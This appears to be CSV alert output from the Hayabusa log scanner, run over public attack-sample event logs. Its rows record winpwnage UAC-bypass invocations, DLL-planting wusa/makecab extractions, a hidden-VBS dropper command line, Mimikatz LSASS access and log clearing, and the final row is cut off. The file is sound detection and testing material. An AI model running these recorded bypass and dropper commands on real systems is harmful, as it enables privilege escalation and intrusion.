C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx -2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx -2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: 
""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child 
Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 
11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: 
C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 
-2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent 
